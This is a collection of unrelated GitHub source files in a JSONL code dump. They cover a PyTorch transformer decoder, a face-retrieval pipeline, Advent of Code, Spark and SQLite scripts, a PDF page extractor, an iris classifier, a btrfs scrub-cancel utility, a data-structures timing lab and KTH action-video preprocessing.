memory.size()) \n # tgt2,attn_weights = self.multihead_attn(query=self.with_pos_embed(tgt2, query_pos),\n # key=self.with_pos_embed(memory, pos),\n # value=memory, attn_mask=memory_mask,\n # key_padding_mask=memory_key_padding_mask)\n # # print(tgt2.size())\n # # sss\n tgt2 = tgt + self.dropout2(tgt2)\n # # # print('2', tgt.size())\n # tgt2 = self.norm3(tgt)\n tgt2 = self.linear2(self.dropout(self.activation(self.linear1(tgt2))))\n # # print(tgt2.size())\n # # tgt = tgt + self.dropout3(tgt2)\n # # print()\n # print(attn_weights.size())\n # ssss\n return tgt2, attn_weights\n\n def forward(self, tgt, memory,\n tgt_mask: Optional[Tensor] = None,\n memory_mask: Optional[Tensor] = None,\n tgt_key_padding_mask: Optional[Tensor] = None,\n memory_key_padding_mask: Optional[Tensor] = None,\n pos: Optional[Tensor] = None,\n query_pos: Optional[Tensor] = None,\n residual=True):\n if self.normalize_before:\n return self.forward_pre(tgt, memory, tgt_mask, memory_mask,\n tgt_key_padding_mask, memory_key_padding_mask, pos, query_pos)\n return self.forward_post(tgt, memory, tgt_mask, memory_mask,\n tgt_key_padding_mask, memory_key_padding_mask, pos, query_pos,residual)\n\n def _generate_square_subsequent_mask(self, ls, sz):\n mask = (torch.triu(torch.ones(ls, sz)) == 1).transpose(0, 1)\n mask = mask.float().masked_fill(mask == 0, float('-inf')).masked_fill(mask == 1, float(0.0))\n return mask\n\n\ndef _get_clones(module, N):\n return nn.ModuleList([copy.deepcopy(module) for i in range(N)])\n\n\n\ndef _get_activation_fn(activation):\n \"\"\"Return an activation function given a string\"\"\"\n if activation == \"relu\":\n return F.relu\n if activation == \"gelu\":\n return F.gelu\n if activation == \"glu\":\n return F.glu\n raise RuntimeError(F\"activation should be relu/gelu, not {activation}.\")","repo_name":"xmed-lab/SAHC","sub_path":"decoder.py","file_name":"decoder.py","file_ext":"py","file_size_in_byte":10817,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"72"} +{"seq_id":"33057965957","text":"import numpy as np\n\nfrom retrieval.register import Map, Collector, Canvas, parse_feature\nfrom util.multi_process import MultiprocessingQueue, MultiprocessingDictQueue\nfrom util.arguments import get_args_for_all_object_structurization\nfrom util.pipeline import Pipeline\nfrom main_pipeline.main_pipeline import MainPipeline\n\n\nclass AllObjectStructurization:\n def __init__(self, display):\n self.display = display\n self.index_little = None\n self.index_large = None\n self.idx2face_little = None\n self.face_register_pipeline = None\n self.idx2face_large = Map(multi_flag=True)\n self.queue_obj = MultiprocessingQueue()\n self.args = get_args_for_all_object_structurization()\n self.infer_result_queue_by_channel = MultiprocessingDictQueue(\n self.args.main_pipeline_channel_count)\n self.stream_bbox_queue_by_channel = MultiprocessingDictQueue(\n self.args.main_pipeline_channel_count)\n self.main()\n\n def get_index(self):\n import faiss\n from retrieval.feature_retrieval import Searcher\n\n d = self.args.index_vector_dimension # vector dims\n quantizer = faiss.IndexFlatL2(d)\n\n self.index_little = Searcher(\n mode=\"normal_flat\",\n device_id=self.args.index_little_device_ids,\n quantizer=quantizer,\n d=d,\n nlist=self.args.index_cluster_count)\n self.index_large = Searcher(mode=\"ivf_sq\",\n device_id=self.args.index_large_device_ids,\n quantizer=quantizer,\n d=d,\n nlist=self.args.index_cluster_count)\n\n try:\n self.index_little.load(self.args.index_loading_path_little)\n self.idx2face_little = Map(self.args.idx2face_name_map_path)\n except NotADirectoryError:\n self.create_little_index()\n\n try:\n self.index_large.load(self.args.index_loading_path_large)\n except NotADirectoryError:\n self.create_large_index()\n\n def create_little_index(self):\n self.idx2face_little = Map()\n self.register_faces()\n self.index_little.save(self.args.index_loading_path_little)\n self.idx2face_little.save(self.args.idx2face_name_map_path)\n\n def create_large_index(self):\n np.random.seed(1234)\n xb = np.random.random(\n (self.args.index_base_size,\n self.args.index_vector_dimension)).astype('float32')\n self.index_large.train(xb)\n self.index_large.save(self.args.index_loading_path_large)\n\n def register_faces(self):\n self.face_register_pipeline = Pipeline(\n pipeline_cfg_file=self.args.face_feature_pipeline_path,\n stream_name=self.args.face_feature_pipeline_name,\n in_plugin_id=0)\n canvas_width, canvas_height = self.args.canvas_size\n collection = Collector(self.args.face_root_path, \"face\")\n canvas = Canvas(canvas_height, canvas_width)\n idx = 0\n for key, path in collection:\n print(f\"{key}: {path}\")\n enlarged_img = canvas(path, binary=True)\n ret = self.face_register_pipeline.infer(image_bin=enlarged_img)\n if ret:\n vector = parse_feature(ret)\n if vector:\n mtx = np.asarray(vector, dtype=np.float32)[np.newaxis, :]\n self.index_little.add(mtx, idx)\n self.idx2face_little[str(idx)] = key\n idx += 1\n\n def main(self):\n if not self.args.main_pipeline_only:\n self.get_index()\n\n main_pipeline = MainPipeline(self.args, self.queue_obj, self.stream_bbox_queue_by_channel)\n feature_retrieval = RegisterAndRetrive(self.args, self.index_little,\n self.index_large,\n self.idx2face_little,\n self.idx2face_large,\n self.queue_obj,\n self.infer_result_queue_by_channel)\n display = self.display(self.args, self.infer_result_queue_by_channel, self.stream_bbox_queue_by_channel)\n\n try:\n main_pipeline.start()\n display.start()\n feature_retrieval.run()\n except KeyboardInterrupt:\n if main_pipeline.is_alive():\n main_pipeline.kill()\n if display.is_alive():\n display.kill()\n print(\"Stop AllObjectsStructuring successfully.\")\n\n\nclass RegisterAndRetrive:\n def __init__(self, args, index_little, index_large, idx2face_little,\n idx2face_large, queue_obj, queue_display):\n self.args = args\n self.index_little = index_little\n self.index_large = index_large\n self.idx2face_little = idx2face_little\n self.idx2face_large = idx2face_large\n self.queue_obj = queue_obj\n self.queue_display = queue_display\n\n def run(self):\n while True:\n obj_dict = self.queue_obj.get()\n channel_id = obj_dict.get(\"channel_id\")\n if not isinstance(channel_id, int):\n raise IOError(\"Channel Id not found.\")\n\n if self.args.main_pipeline_only or \\\n obj_dict.get(\"object_name\") != \"face\":\n self.queue_display.put(obj_dict, channel_id)\n continue\n\n feat_vec = obj_dict.get(\"feature_vector\")\n feat_vec = np.asarray(feat_vec, dtype=np.float32)[np.newaxis, :]\n obj_idx = obj_dict.get(\"object_index\")\n\n # Todo 序号需要转换成字符吗\n idx_large = self.index_large.add(feat_vec)\n self.idx2face_large[idx_large] = obj_idx\n\n distance, indexes = self.index_little.search(\n feat_vec, self.args.index_topk)\n idx_little = str(indexes[0][0])\n retrieved_key = self.idx2face_little[idx_little]\n obj_dict[\"retrieved_key\"] = retrieved_key\n self.queue_display.put(obj_dict, channel_id)\n","repo_name":"Ascend/mindxsdk-referenceapps","sub_path":"mxVision/AllObjectsStructuring/util/main_entry.py","file_name":"main_entry.py","file_ext":"py","file_size_in_byte":6214,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"12601901492","text":"f = open(\"./input.txt\")\n\n\ndef serialize(x, y):\n return f'{x}:{y}'\n\n\ndef serialize_steps(x, y, steps):\n return f'{x}:{y}:{steps}'\n\n\nwire1 = f.readline().strip().split(\",\")\nwire2 = f.readline().strip().split(\",\")\n\n\ndef draw_path(wire):\n x = 0\n y = 0\n path = set()\n step_map = {}\n steps = 0\n\n for instruction in wire:\n direction = instruction[0]\n distance = int(instruction[1:])\n for i in range(1, distance + 1):\n steps += 1\n if direction == 'U':\n y += 1\n if direction == 'D':\n y -= 1\n if direction == 'L':\n x -= 1\n if direction == 'R':\n x += 1\n serialized = serialize(x, y)\n if serialized not in path:\n path.add(serialized)\n step_map[serialized] = steps\n\n return path, step_map\n\n\n(wire1_path, wire1_steps) = draw_path(wire1)\n(wire2_path, wire2_steps) = draw_path(wire2)\n\n# p1\nintersections = wire1_path.intersection(wire2_path)\nintersection_coords = [intersection.split(\n \":\") for intersection in intersections]\nintersection_distances = [abs(int(x)) + abs(int(y))\n for x, y in intersection_coords]\nprint(min(intersection_distances))\n\n# p2\ntotal_intersection_steps = [wire1_steps[intersection] +\n wire2_steps[intersection] for intersection in intersections]\nprint(min(total_intersection_steps))\n","repo_name":"spiderbites/advent-of-code-2019","sub_path":"d3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34050535790","text":"from src.utils.spark_factory import get_spark\r\nfrom src import *\r\nimport urllib.parse\r\n\r\n_spark=get_spark()\r\n\r\ndef staging2storage(landing_script, hist_table, buss_date):\r\n\r\n logger.info(\"Load Landing from {0} to ods.{1} started.\".format(landing_script, hist_table))\r\n sql_path = SQL_STORAGE_PATH\r\n\r\n with open(sql_path + landing_script) as fr:\r\n file_content = fr.read()\r\n\r\n query = file_content % (STAGING_SCHEMA)\r\n if buss_date != '0':\r\n query += \" AND BUSS_DATE = '{}' \".format(buss_date)\r\n\r\n logger.error(query)\r\n\r\n df_sql = _spark.sql(query)\r\n df_sql.createOrReplaceTempView('{0}'.format(hist_table))\r\n\r\n\r\n logger.info(\"Writing to Storage...\")\r\n table_list_hist = _spark.sql(\"show tables in {0}\".format(HIST_SCHEMA))\r\n table_name_hist = table_list_hist.filter(table_list_hist.tableName == \"{0}\".format(hist_table)) \\\r\n .filter(table_list_hist.isTemporary == \"false\").collect()\r\n if len(table_name_hist) > 0:\r\n _spark.sql(\"SET hive.exec.dynamic.partition.mode = nonstrict\")\r\n _spark.sql('''\r\n INSERT OVERWRITE TABLE {0}.{1} partition(buss_date)\r\n SELECT * FROM {1}\r\n '''.format(HIST_SCHEMA, hist_table))\r\n else:\r\n logger.error(\"Table Not Existed\")\r\n\r\n\r\n logger.info(\"Write data to {0}.{1} finished.\".format(HIST_SCHEMA, hist_table))\r\n\r\n\r\n\r\n\r\n","repo_name":"helsaprimadiana/read-mongo-to-hive","sub_path":"src/feature/staging2storage.py","file_name":"staging2storage.py","file_ext":"py","file_size_in_byte":1462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18784150856","text":"import sqlite3\n\nsqlite_file='data_49002sqlite'\ntable_name='holder'\nnew_field1='outlet1'\nnew_field2='outlet2'\nnew_field3='outlet3'\nnew_field4='outlet4'\nfield_type='INTEGER'\n\nconn=sqlite3.connect(sqlite_file)\nc=conn.cursor()\n\nc.execute('CREATE TABLE {tn} ({nf1} {ft})'\\\n .format(tn=table_name, nf1=new_field1, ft=field_type))\n\nc.execute(\"ALTER TABLE {tn} ADD COLUMN '{nf2}' {ft}\"\\\n .format(tn=table_name, nf2=new_field2, ft=field_type))\n\nc.execute(\"ALTER TABLE {tn} ADD COLUMN '{nf3}' {ft}\"\\\n .format(tn=table_name, nf3=new_field3, ft=field_type))\n\nc.execute(\"ALTER TABLE {tn} ADD COLUMN '{nf4}' {ft}\"\\\n .format(tn=table_name, nf4=new_field4, ft=field_type))\n\nconn.commit()\nconn.close()\n","repo_name":"SirMrShyGuy/Capstone-Project","sub_path":"Database/sqlite_table_setup.py","file_name":"sqlite_table_setup.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"163720599","text":"from tests_common.pytest_bdd import (\n given,\n)\n\nfrom mail.devpack.lib.components.sharpei import SharpeiCloud\n\n\n@given(\"cloud sharpei is started\")\ndef step_cloud_sharpei_is_started(context):\n context.iam_server.reset()\n context.yc_server.reset()\n context.coord.components[SharpeiCloud].restart()\n context.sharpei_api = context.coord.components[SharpeiCloud].api()\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"mail/tests/integration/steps/cloud_steps.py","file_name":"cloud_steps.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26628508367","text":"## Import\nfrom PyPDF2 import PdfFileReader, PdfFileWriter\n\n## Create the PdfFileReader instance and Create a new PDF file using PdfFileWriter\nold_pdf = PdfFileReader(open(\"lorem.pdf\", \"rb\"))\nnew_pdf = PdfFileWriter()\n\n## Loop through the pages and add them to the new PDF file\nfor page in old_pdf.pages[1:4]: # [1:4] means from page 1 to page 3\n new_pdf.addPage(page)\n\n## Save the new PDF file\nwith open(\"new_lorem_pdf.pdf\", \"wb\") as f:\n new_pdf.write(f)\n\n","repo_name":"giridhar7632/working-with-pdf-demo","sub_path":"04_extract_text_to_pdf.py","file_name":"04_extract_text_to_pdf.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26400920826","text":"# 文件功能:随机森林分类鸢尾花数据集\n\"\"\"\n随机森林主要应用于回归和分类两种场景,侧重于分类。随机森林是指利用多棵树对样本数据进行训练、分类并预测的一种方法。\n它在对数据进行分类的同时,还可以给出各个变量的重要性评分,评估各个变量在分类中所起的作用。\n\"\"\"\n\"\"\"\n随机森林的构建:\n1.首先利用bootstrap方法有放回地从原始训练集中随机抽取n个样本,并构建n个决策树;\n2.然后假设在训练样本数据中有m个特征,那么每次分裂时选择最好的特征进行分裂,每棵树都一直这样分裂下去,直到该节点\n3.的所有训练样例都属于同一类;接着让每棵决策树在不做任何修剪的前提下最大限度地生长;\n4.最后将生成的多棵分类树组成随机森林,用随机森林分类器对新的数据进行分类与回归。对于分类问题,按多棵树分类器投票决定最终分类结果;对于回归问题,则由多棵树预测值的均值决定最终预测结果\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.colors import ListedColormap\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.datasets import load_iris\n\nRF = RandomForestClassifier()\niris = load_iris()\nX = X = iris.data[:, :2] #获取花卉两列数据集\nY = iris.target\nRF.fit(X, Y)\n#meshgrid函数生成两个网格矩阵\nh = .02\nx_min, x_max = X[:, 0].min() - .5, X[:, 0].max() + .5\ny_min, y_max = X[:, 1].min() - .5, X[:, 1].max() + .5\nxx, yy = np.meshgrid(np.arange(x_min, x_max, h), np.arange(y_min, y_max, h))\n\n#pcolormesh函数将xx,yy两个网格矩阵和对应的预测结果Z绘制在图片上\nZ = RF.predict(np.c_[xx.ravel(), yy.ravel()])\nZ = Z.reshape(xx.shape)\nplt.figure(1, figsize=(8,6))\nplt.pcolormesh(xx, yy, Z, shading='auto',cmap=plt.cm.Paired)\n\n#绘制散点图\nplt.scatter(X[:50,0], X[:50,1], color='red',marker='o', label='setosa')\nplt.scatter(X[50:100,0], X[50:100,1], color='blue', marker='x', label='versicolor')\nplt.scatter(X[100:,0], X[100:,1], color='green', marker='s', label='Virginica')\n\nplt.xlabel('Sepal length')\nplt.ylabel('Sepal width')\nplt.xlim(xx.min(), xx.max())\nplt.ylim(yy.min(), yy.max())\nplt.xticks(())\nplt.yticks(())\nplt.legend(loc=2)\nplt.title('RandomForestClassifier')\nplt.show()","repo_name":"Nanxia77/ml_work","sub_path":"鸢尾花数据集算法比较/Random Forest.py","file_name":"Random Forest.py","file_ext":"py","file_size_in_byte":2345,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38505180987","text":"#! /usr/bin/env python3\ntry:\n\timport psutil\nexcept:\n\tprint(\"can't import psutil, you don't have this installed\")\n\texit(0)\n\t\nimport subprocess, shlex #standard library, should be able to import without problem\n\ntry:\n\tfor process in psutil.process_iter():\n\t\tcommand = process.cmdline()\n\t\tif len(command) == 4 and command[0] == \"btrfs\" and command[1] == \"scrub\" and command[2] in [\"start\", \"resume\"]:\n\t\t\tcancelCommand = f\"btrfs scrub cancel {command[3]}\"\n\t\t\tprint(f\"execute '{cancelCommand}'\")\n\t\t\ttry:\n\t\t\t\tsubprocess.run(shlex.split(cancelCommand), timeout=60, check=True)\n\t\t\t\tprint(\"success\")\n\t\t\texcept subprocess.TimeoutExpired:\n\t\t\t\tprint(\"Failed to cancel scrub (command timeout)\")\n\t\t\texcept subprocess.CalledProcessError as error:\n\t\t\t\tprint(f\"Failed to cancel scrub (status code {error.returncode})\")\n\t\t\texcept:\n\t\t\t\tprint(f\"Failed to cancel scrub (unknown failure)\")\nexcept:\n\tprint(\"error happened, graceful exit\")\n\texit(0)\n","repo_name":"axzxc1236/btrfs-auto-cancel-scrub","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"20731667814","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# #### Lab4 \n# #### Data Structures and Algorithms\n# #### Maira usman \n# #### 21B-011-SE \n\n# In[8]:\n\n\nfrom matplotlib import pyplot as plt \nimport numpy as np \ndef version1(n):\n totalSum = 0 \n matrix= np.random.randint(10, size=(n, n)) \n rowSum=[0]*n\n counter=3\n for i in range(0,n): \n rowSum[i] = 0 \n counter+=1 \n for j in range(0, n ) : \n rowSum[i] = rowSum[i] + matrix[i,j] \n totalSum = totalSum + matrix[i,j] \n counter+=2\n return counter \ndef version2(n): \n matrix= np.random.randint(10, size=(n, n)) \n totalSum = 0 # Version 1 18 matrix= np.random.randint(10, size=(n, n)) \n rowSum=[0]*n\n counter=3 #Counts the number of statement excuted , excluding the counter updates \n for i in range(0,n,1): \n rowSum[i] = 0 \n counter+=1 \n for j in range(0, n ) : \n rowSum[i] = rowSum[i] + matrix[i,j] \n counter+=1 \n totalSum = totalSum + rowSum[i] \n counter+=1 \n return counter \ndef simulation(n): \n steps_version1=[0]*n \n steps_version2 = [0] * n \n for i in range(0,n): \n steps_version1[i]=version1(i) \n steps_version2[i]=version2(i) \n x=list(range(n)) \n plt.plot(x,steps_version2) \n plt.plot(x, steps_version1) \n plt.grid(which='both') \n plt.xlabel(f'Input Size({n})')\n plt.ylabel('Number of Steps') \n plt.legend(['version2','version1']) \n plt.show() \nsimulation(50)\nsimulation(120)\nsimulation(200)\n\n\n# In[1]:\n\n\nfrom timeit import Timer \nimport matplotlib.pyplot as plt \ndef concatenation(): \n l = [] \n for i in range(1000):\n l = l + [i] \ndef append(): \n l = [] \n for i in range(1000): \n l.append(i) \ndef comprehension(): \n l = [i for i in range(1000)] \ndef rangeFunction(): \n l = list(range(1000)) \nt1 = Timer(\"concatenation()\", \"from __main__ import concatenation\") \nconcatTime = t1.timeit(number=1000) \nprint(\"concatination \", concatTime , \"milliseconds\") \nt2 = Timer(\"append()\", \"from __main__ import append\") \nappendTime = t2.timeit(number=1000) \nprint(\"append \", appendTime , \"milliseconds\") \nt3 = Timer(\"comprehension()\", \"from __main__ import comprehension\")\ncompTime= t3.timeit(number=1000)\nprint(\"comprehension \", compTime , \"milliseconds\") \nt4 = Timer(\"rangeFunction()\", \"from __main__ import rangeFunction\")\nrangeTime = t4.timeit(number=1000) \nprint(\"list range \",rangeTime , \"milliseconds\") \n\nfig = plt.figure() \nax = fig.add_axes([0,0,1,1]) \nlangs = ['concatination', 'append', 'comprehension', 'Range'] \nstudents = [concatTime ,appendTime ,compTime ,rangeTime] \nax.bar(langs,students) \nplt.show() \n\n\n# In[27]:\n\n\ndef ex1(n):\n count=0\n for i in range(n):\n count+=1\n return count\ndef ex2(n):\n count=0\n for i in range(n):\n count+=1\n for j in range(n):\n count+=1\n return count\ndef ex3(n):\n count=0\n for i in range(n):\n for j in range(n):\n count+=1\n return count\ndef ex4(n):\n count=0\n for i in range(n):\n for j in range(10):\n count+=1\n return count\ndef ex5(n):\n count=0\n for i in range(n):\n for j in range(i+1):\n count+=1\n return count\ndef ex6( n ):\n count = 0\n i = n\n while i >= 1 :\n count += 1\n i = i // 2\n return count\ndef ex7(n):\n count=0\n for i in range(n):\n count+=ex6(n)\n return count\ndef simulation(n): \n steps_version1=[0]*n \n steps_version2 = [0] * n \n steps_version3 = [0] * n\n steps_version4 = [0] * n\n steps_version5 = [0] * n\n steps_version6 = [0] * n\n steps_version7 = [0] * n\n for i in range(0,n): \n steps_version1[i]=ex1(i) \n steps_version2[i]=ex2(i) \n steps_version3[i]=ex3(i) \n steps_version4[i]=ex4(i) \n steps_version5[i]=ex5(i) \n steps_version6[i]=ex6(i)\n steps_version7[i]=ex7(i) \n x=list(range(n)) \n plt.plot(x,steps_version7) \n plt.plot(x,steps_version6) \n plt.plot(x,steps_version5) \n plt.plot(x,steps_version4) \n plt.plot(x,steps_version3) \n plt.plot(x,steps_version2) \n plt.plot(x,steps_version1) \n plt.grid(which='both') \n plt.xlabel(f'Input Size({n})')\n plt.ylabel('Number of Steps') \n plt.legend(['version7','version6','version5','version4','version3','version2','version1']) \n plt.show() \nsimulation(20)\n\n\n# In[23]:\n\n\nimport random\ncount=0\nlst=[i for i in range(1000)]\n\nprint(\"shuffledlist element 50 : \", lst.index(50))\ncase=[]\nfor i in range(50):\n random.shuffle(lst)\n case.append(lst.index(50)) \nprint(\"best case: \",min(case))\nprint(\"worst case: \",min(case))\nprint(\"average case: \",sum(case)//len(case)) \n\n\n# In[ ]:\n\n\n\n\n","repo_name":"Myrausman/Data-Structures-and-ALgorithms","sub_path":"labs/Dsa lab4 .py","file_name":"Dsa lab4 .py","file_ext":"py","file_size_in_byte":4779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15562655370","text":"import imageio\r\nimport cv2\r\nimport numpy as np\r\nimport os\r\nimport pickle\r\nimport re\r\nimport torch\r\nfrom torch.utils.data import Dataset, DataLoader\r\nfrom skimage.transform import resize\r\nfrom PIL import Image\r\n#from scipy.misc.pilutil import imresize\r\nfrom torch.autograd import Variable\r\n\r\nimport argparse\r\nimport torch\r\nimport torch.nn as nn\r\nfrom torch.autograd import Variable\r\nfrom matplotlib import pyplot as plt\r\nimport argparse\r\nimport os\r\n\r\nCATEGORIES = [\r\n \"boxing\",\r\n \"handclapping\",\r\n \"handwaving\",\r\n \"jogging\",\r\n \"running\",\r\n \"walking\"\r\n]\r\n\r\n# Dataset are divided according to the instruction at:\r\n# http://www.nada.kth.se/cvap/actions/00sequences.txt\r\nTraining_ID = [11, 12, 13, 14, 15, 16, 17, 18]\r\nTesting_ID = [19, 20, 21, 23, 24, 25, 1, 4]\r\nValidation_ID = [22, 2, 3, 5, 6, 7, 8, 9, 10]\r\n\r\ndef raw_dataset(dataset=\"train\"):\r\n if dataset == \"train\":\r\n ID = Training_ID\r\n elif dataset == \"test\":\r\n ID = Testing_ID\r\n else:\r\n ID = Validation_ID\r\n\r\n frames_index = parsing_sequence_file()\r\n\r\n data = []\r\n\r\n for category in CATEGORIES:\r\n # Get all files in current category's folder.\r\n folder_path = os.path.join(\"..\", \"dataset\", category)\r\n filenames = sorted(os.listdir(folder_path))\r\n\r\n for filename in filenames:\r\n filepath = os.path.join(\"..\", \"dataset\", category, filename)\r\n\r\n # Get id of person in this video.\r\n person_id = int(filename.split(\"_\")[0][6:])\r\n if person_id not in ID:\r\n continue\r\n\r\n vid = imageio.get_reader(filepath, \"ffmpeg\")\r\n\r\n frames = []\r\n\r\n # Add each frame to correct list.\r\n for i, frame in enumerate(vid):\r\n # Boolean flag to check if current frame contains human.\r\n ok = False\r\n for seg in frames_index[filename]:\r\n if i >= seg[0] and i <= seg[1]:\r\n ok = True\r\n break\r\n if not ok:\r\n continue\r\n\r\n # Convert to grayscale.\r\n frame = Image.fromarray(np.array(frame))\r\n frame = frame.convert(\"L\")\r\n frame = np.array(frame.getdata(),dtype=np.uint8).reshape((120, 160))\r\n frame = resize(frame, (60, 80))\r\n \r\n frames.append(frame)\r\n \r\n data.append({\r\n \"filename\": filename,\r\n \"category\": category,\r\n \"frames\": frames \r\n })\r\n print(data)\r\n pickle.dump(data, open(\"data/%s.p\" % dataset, \"wb\"))\r\n \r\ndef optflow_dataset(dataset=\"train\"):\r\n if dataset == \"train\":\r\n ID = Training_ID\r\n elif dataset == \"test\":\r\n ID = Testing_ID\r\n else:\r\n ID = Validation_ID\r\n\r\n # Setup parameters for optical flow.\r\n farneback_params = dict(\r\n winsize=20, iterations=1,\r\n flags=cv2.OPTFLOW_FARNEBACK_GAUSSIAN, levels=1,\r\n pyr_scale=0.5, poly_n=5, poly_sigma=1.1, flow=None)\r\n\r\n frames_index = parsing_sequence_file()\r\n\r\n data = []\r\n\r\n for category in CATEGORIES:\r\n # Get all files in current category's folder.\r\n folder_path = os.path.join(\"..\", \"dataset\", category)\r\n filenames = sorted(os.listdir(folder_path))\r\n\r\n for filename in filenames:\r\n filepath = os.path.join(\"..\", \"dataset\", category, filename)\r\n\r\n # Get id of person in this video.\r\n person_id = int(filename.split(\"_\")[0][6:])\r\n if person_id not in ID:\r\n continue\r\n\r\n vid = imageio.get_reader(filepath, \"ffmpeg\")\r\n\r\n flow_x = []\r\n flow_y = []\r\n\r\n prev_frame = None\r\n # Add each frame to correct list.\r\n for i, frame in enumerate(vid):\r\n # Boolean flag to check if current frame contains human.\r\n ok = False\r\n for seg in frames_index[filename]:\r\n if i >= seg[0] and i <= seg[1]:\r\n ok = True\r\n break\r\n if not ok:\r\n continue\r\n\r\n # Convert to grayscale.\r\n frame = Image.fromarray(np.array(frame))\r\n frame = frame.convert(\"L\")\r\n frame = np.array(frame.getdata(),dtype=np.uint8).reshape((120, 160))\r\n frame = resize(frame,(60, 80))\r\n\r\n if prev_frame is not None:\r\n # Calculate optical flow.\r\n flows = cv2.calcOpticalFlowFarneback(prev_frame, frame,**farneback_params)\r\n subsampled_x = np.zeros((30, 40), dtype=np.float32)\r\n subsampled_y = np.zeros((30, 40), dtype=np.float32)\r\n\r\n for r in range(30):\r\n for c in range(40):\r\n subsampled_x[r, c] = flows[r*2, c*2, 0]\r\n subsampled_y[r, c] = flows[r*2, c*2, 1]\r\n\r\n flow_x.append(subsampled_x)\r\n flow_y.append(subsampled_y)\r\n\r\n prev_frame = frame\r\n \r\n data.append({\r\n \"filename\": filename,\r\n \"category\": category,\r\n \"flow_x\": flow_x,\r\n \"flow_y\": flow_y \r\n })\r\n\r\n pickle.dump(data, open(\"data/%s_flow.p\" % dataset, \"wb\"))\r\n\r\ndef parsing_sequence_file():\r\n print(\"Parsing ../dataset/00sequences.txt\")\r\n #listing= os.listdir('sequences.txt')\r\n # Read 00sequences.txt file.\r\n \r\n with open('../dataset/sequence.txt', 'r') as content_file:\r\n content = content_file.read()\r\n\r\n # Replace tab and newline character with space, then split file's content\r\n # into strings.\r\n content = re.sub(\"[\\t\\n]\", \" \", content).split()\r\n\r\n # Dictionary to keep ranges of frames with humans.\r\n # Example:\r\n # video \"person01_boxing_d1\": [(1, 95), (96, 185), (186, 245), (246, 360)].\r\n frames_index = {}\r\n\r\n # Current video that we are parsing.\r\n current_filename = \"\"\r\n\r\n for s in content:\r\n if s == \"frames\":\r\n # Ignore this token.\r\n continue\r\n elif s.find(\"-\") >= 0:\r\n # This is the token we are looking for. e.g. 1-95.\r\n if s[len(s) - 1] == ',':\r\n # Remove comma.\r\n s = s[:-1]\r\n\r\n # Split into 2 numbers => [1, 95]\r\n idx = s.split(\"-\")\r\n\r\n # Add to dictionary.\r\n if not current_filename in frames_index:\r\n frames_index[current_filename] = []\r\n frames_index[current_filename].append((int(idx[0]), int(idx[1])))\r\n else:\r\n # Parse next file.\r\n current_filename = s + \"_uncomp.avi\"\r\n\r\n return frames_index\r\n\r\nCATEGORY_INDEX = {\r\n \"boxing\": 0,\r\n \"handclapping\": 1,\r\n \"handwaving\": 2,\r\n \"jogging\": 3,\r\n \"running\": 4,\r\n \"walking\": 5\r\n}\r\n\r\nclass opticalflowdataset(Dataset):\r\n def __init__(self, directory, dataset=\"train\", mean=None):\r\n self.instances, self.labels = self.read_dataset(directory, dataset)\r\n\r\n for i in range(len(self.instances)):\r\n self.instances[i][\"frames\"] = torch.from_numpy(\r\n self.instances[i][\"frames\"])\r\n self.instances[i][\"flow_x\"] = torch.from_numpy(\r\n self.instances[i][\"flow_x\"])\r\n self.instances[i][\"flow_y\"] = torch.from_numpy(\r\n self.instances[i][\"flow_y\"])\r\n\r\n self.labels = torch.from_numpy(self.labels)\r\n\r\n def __len__(self):\r\n return len(self.instances)\r\n\r\n def __getitem__(self, idx):\r\n sample = { \r\n \"instance\": self.instances[idx], \r\n \"label\": self.labels[idx] \r\n }\r\n\r\n return sample\r\n\r\n def zero_center(self, mean):\r\n for i in range(len(self.instances)):\r\n self.instances[i][\"frames\"] -= float(mean[\"frames\"])\r\n self.instances[i][\"flow_x\"] -= float(mean[\"flow_x\"])\r\n self.instances[i][\"flow_y\"] -= float(mean[\"flow_y\"])\r\n\r\n def read_dataset(self, directory, dataset=\"train\", mean=None):\r\n if dataset == \"train\":\r\n frame_path = os.path.join(directory, \"train.p\")\r\n flow_path = os.path.join(directory, \"train_flow.p\")\r\n elif dataset == \"test\":\r\n frame_path = os.path.join(directory, \"test.p\")\r\n flow_path = os.path.join(directory, \"test_flow.p\")\r\n else:\r\n frame_path = os.path.join(directory, \"validation.p\")\r\n flow_path = os.path.join(directory, \"validation_flow.p\")\r\n\r\n video_frames = pickle.load(open(frame_path, \"rb\"))\r\n video_flows = pickle.load(open(flow_path, \"rb\"))\r\n\r\n instances = []\r\n labels = []\r\n\r\n mean_frames = 0\r\n mean_flow_x = 0\r\n mean_flow_y = 0\r\n\r\n for i_video in range(len(video_frames)):\r\n current_block_frame = []\r\n current_block_flow_x = []\r\n current_block_flow_y = []\r\n\r\n frames = video_frames[i_video][\"frames\"]\r\n flow_x = [0] + video_flows[i_video][\"flow_x\"]\r\n flow_y = [0] + video_flows[i_video][\"flow_y\"]\r\n\r\n for i_frame in range(len(frames)):\r\n current_block_frame.append(frames[i_frame])\r\n\r\n if i_frame % 15 > 0:\r\n current_block_flow_x.append(flow_x[i_frame])\r\n current_block_flow_y.append(flow_y[i_frame])\r\n\r\n if (i_frame + 1) % 15 == 0:\r\n current_block_frame = np.array(\r\n 